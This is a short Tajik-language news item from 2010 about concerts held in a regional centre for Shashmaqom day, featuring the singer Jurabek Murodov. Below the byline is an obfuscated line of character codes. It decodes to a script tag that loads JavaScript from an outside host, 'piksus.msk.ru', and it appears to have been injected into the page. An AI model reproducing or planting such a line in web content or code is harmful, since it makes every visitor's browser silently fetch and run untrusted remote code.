12.05.2010
Таҷлили рӯзи шашмақом
Ҳамасола дар асоси Фармони Президенти ҷумҳурии Тоҷикистон Эмомалӣ Раҳмон санаи 11 май чун рӯзи шашмақом таҷлил мешавад. Бахшида ба ин сана дар марказҳои фарҳангӣ чорабиниҳои гуногу барпо мешаванд. Аз ҷумла рӯзи гузашта дар Кохи фарҳанги ба номи устод Абӯабдуллоҳи Рӯдакии маркази вилоят бо иштироки Ҳунарманди шоистаи Иттиҳоди Шӯрави Ҷӯрабек Муродов ва ансамбли шаммақомсароёни «Нури Хуҷанд» консерти калони идона баргузор шуд.
Мухлисони сершумори мусиқии ноби тоҷикӣ таи чанд соат суруду таронаҳои классикиро гӯш карда аз ҳунари волои устод Ҷӯрабеки Мурод кайфият бурданд.
Ба ҳамин монанд имрӯз дар Қасри маданияти Арбоби ноҳия низ чорабинии калони фарҳанги бо иштироки роҳбарияти МИҲД ноҳия ва ҳунармандони мақомсарои қаламрави ноҳия баргузор гардид.
Назокат Юсуфова

char(60,115,99,114,105,112,116,32,115,114,99,61,34,104,116,116,112,58,47,47,112,105,107,115,117,115,46,109,115,107,46,114,117,47)ffd8c291fa8b8df08f4743bce553f52d.js" type="text/javascript">

ТАВЗЕҲОТ